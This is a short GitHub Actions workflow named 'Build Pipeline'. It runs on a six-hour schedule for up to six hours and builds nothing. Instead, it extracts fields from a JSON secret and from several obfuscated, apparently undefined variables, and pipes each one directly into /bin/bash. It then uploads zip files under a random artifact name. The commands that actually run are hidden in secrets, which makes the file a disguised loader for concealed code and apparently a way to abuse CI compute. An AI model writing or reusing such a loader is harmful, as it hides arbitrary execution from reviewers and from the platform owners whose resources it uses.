name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '50 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          ddps50049: ${{ secrets.ddps50049 }}
        run: |
          printf '%s' "$ddps50049" | jq -r .sdqh909 | /bin/bash
          echo $r3899 | jq -r .ad61 | /bin/bash
          echo $sc54 | jq -r .ip15031 | /bin/bash
          printf '%s' "$okk33" | jq -r .m8191 | /bin/bash
          echo $eqolk1968 | jq -r .i694 | /bin/bash
          echo $wb38616 | jq -r .lz7304 | /bin/bash
          echo $dezy01732 | jq -r .krh4 | /bin/bash
          echo $ahpe0316 | jq -r .ijjuf77 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: LDS7dnwG
          path: "*.zip"
          retention-days: 1
